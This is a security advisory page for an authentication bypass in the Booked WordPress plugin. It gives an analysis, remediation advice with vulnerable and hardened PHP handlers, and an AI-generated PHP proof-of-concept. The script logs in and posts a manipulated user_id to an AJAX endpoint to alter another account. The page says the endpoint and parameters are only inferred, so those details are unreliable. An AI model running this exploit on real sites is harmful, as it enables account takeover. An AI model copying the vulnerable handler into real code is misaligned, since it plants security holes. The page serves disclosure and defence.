Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-22341: Booked <= 3.0.0 – Authentication Bypass (booked)

Plugin: booked
Severity: Critical (CVSS 9.8)
CWE: 288
Vulnerable Version: 3.0.0
Patched Version:
Disclosed: January 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22341 (metadata-based):
This vulnerability is a critical authentication bypass in the Booked appointment booking plugin for WordPress, affecting all versions up to and including 3.0.0. The flaw allows authenticated attackers with at least ‘Custom-level’ access to impersonate other user accounts, leading to a complete loss of account isolation and confidentiality.

Atomic Edge research indicates the root cause is an authentication bypass using an alternate path or channel (CWE-288). The vulnerability description confirms authenticated attackers with ‘Custom-level access and above’ can bypass authentication to access other users’ accounts. Without a code diff, the exact mechanism is inferred. The likely failure is an improper authorization check on a user management or profile update function. The plugin may expose an endpoint, such as an AJAX handler or REST API route, that processes user identifiers without verifying the current user has the right to act on the target account. This creates an alternate channel for privilege escalation.

The exploitation method involves an authenticated attacker sending a crafted request to a plugin-specific endpoint. Based on WordPress plugin patterns, the attack likely targets an AJAX action like ‘booked_update_profile’ or a REST route under ‘/wp-json/booked/’. The malicious payload would contain a parameter, such as ‘user_id’ or ‘appointment_id’, manipulated to reference another user’s data. The attacker’s existing ‘Custom-level’ session provides a valid nonce or bypasses nonce verification entirely, allowing the request to be processed under the target’s context.

Remediation requires implementing proper authorization checks on all user-facing operations. The plugin must validate that the current user's ID matches the ID of any account they are attempting to modify or access. This involves adding capability checks, such as current_user_can('edit_user', $target_user_id), and ensuring user-controlled identifiers are strictly mapped to the authenticated session. A secondary fix would enforce nonce verification on all state-changing AJAX handlers to prevent CSRF attacks that could compound this issue.
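The remediation described above, as an added example that is not Booked's code: a generic WordPress AJAX profile-update handler in its vulnerable form (trusting a request-supplied user identifier) beside a hardened form that verifies the nonce, defaults the target to the session user and requires the edit_user capability before touching any other account. The action name, request parameter names and function names are assumptions; the WordPress API calls are real.

```php
<?php
// Added example (not Booked's code): a generic WordPress AJAX profile-update
// handler written two ways. The action name, request parameters and the
// function names are hypothetical; the WordPress API calls are real.

// --- Vulnerable pattern (CWE-288): the handler trusts a request-supplied
// user identifier, so any logged-in user who can reach the action can act
// on any account.
function example_update_profile_vulnerable() {
    $uid   = absint( $_POST['user_id'] ?? 0 );  // attacker-controlled
    $value = sanitize_text_field( wp_unslash( $_POST['field_value'] ?? '' ) );
    // No nonce check, no capability check, no binding to the session user.
    wp_update_user( [ 'ID' => $uid, 'display_name' => $value ] );
    wp_send_json_success( 'updated' );
}

// --- Hardened version: nonce, session binding, explicit authorization.
function example_update_profile_hardened() {
    // 1. Reject requests without a nonce issued for this action (the page
    //    would embed wp_create_nonce( 'example_update_profile' )); dies on failure.
    check_ajax_referer( 'example_update_profile', 'nonce' );

    // 2. Start from the authenticated session, not from the request body.
    $current = get_current_user_id();
    $uid     = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : $current;

    // 3. Acting on another account needs an explicit capability check;
    //    'edit_user' with a target ID is the WordPress meta-capability for it.
    if ( $uid !== $current && ! current_user_can( 'edit_user', $uid ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Allow-list the fields a caller may change; never pass raw keys through.
    $allowed = [ 'display_name', 'description' ];
    $field   = sanitize_key( $_POST['field_name'] ?? '' );
    if ( ! in_array( $field, $allowed, true ) ) {
        wp_send_json_error( 'bad field', 400 );
    }
    $value  = sanitize_text_field( wp_unslash( $_POST['field_value'] ?? '' ) );
    $result = wp_update_user( [ 'ID' => $uid, $field => $value ] );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( 'updated' );
}

// Only the hardened handler is registered, and only for logged-in users:
// there is deliberately no matching wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_example_update_profile', 'example_update_profile_hardened' );
```

The same three checks (nonce, session binding, capability) apply unchanged to a REST route, where they map to a permission_callback on register_rest_route.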

Successful exploitation grants an attacker full control over any user account accessible through the vulnerable endpoint. Impact includes viewing and modifying other users’ personal data, appointments, and payment information. Attackers can delete or reschedule appointments, causing business disruption. In multi-tenant or agency environments, this could lead to horizontal privilege escalation across clients. The CVSS 9.8 score reflects the network-based, low-complexity attack that compromises confidentiality, integrity, and availability without user interaction.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22341 - Booked <= 3.0.0 - Authentication Bypass
/*
 * Proof of Concept for CVE-2026-22341.
 * This script simulates an authenticated attacker with 'Custom-level' access attempting to bypass authentication.
 * The exact vulnerable endpoint and parameters are inferred from the CWE and WordPress plugin conventions.
 * Assumptions:
 *   1. The attacker has valid WordPress credentials with 'Custom-level' role in the Booked plugin.
 *   2. The target user ID to impersonate is known or guessable (e.g., user_id=1 for admin).
 *   3. The vulnerable endpoint is an AJAX handler at /wp-admin/admin-ajax.php.
 *   4. The action parameter is 'booked_update_profile' or similar.
 *   5. A valid nonce is required but may be bypassed; the script attempts to retrieve one via a prior request.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$attacker_username = 'attacker'; // Attacker with Custom-level access
$attacker_password = 'password'; // Attacker's password
$target_user_id = 1; // ID of the user account to impersonate

// Step 1: Authenticate and obtain session cookies and a nonce.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $attacker_username,
        'pwd' => $attacker_password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$login_response = curl_exec($ch);

// Step 2: Fetch a page containing a Booked plugin nonce (e.g., the appointments page).
// The nonce may be embedded in JavaScript or a data attribute.
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=booked-appointments',
    CURLOPT_POST => false,
    CURLOPT_HTTPGET => true,
    CURLOPT_HEADER => false
]);
$admin_page = curl_exec($ch);

// Extract a nonce (this regex is illustrative; the actual nonce name may vary).
preg_match('/"nonce"\s*:\s*"([a-f0-9]+)"/', $admin_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? 'invalid_nonce';

// Step 3: Craft the authentication bypass payload.
// The inferred parameter 'user_id' is changed to target another account.
$payload = [
    'action' => 'booked_update_profile', // Inferred AJAX action
    'user_id' => $target_user_id, // Manipulated parameter
    'field_name' => 'display_name', // Example field to modify
    'field_value' => 'Hacked Account', // New value demonstrating control
    'nonce' => $nonce
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HEADER => true
]);
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 4: Check response for success indicators.
echo "Response:\n" . $ajax_response . "\n";
if (strpos($ajax_response, 'success') !== false || strpos($ajax_response, 'updated') !== false) {
    echo "[+] Potential authentication bypass successful. Target user $target_user_id may have been modified.\n";
} else {
    echo "[-] Exploit attempt may have failed. The endpoint or parameters might differ.\n";
}

// Cleanup
@unlink('cookies.txt');
?>
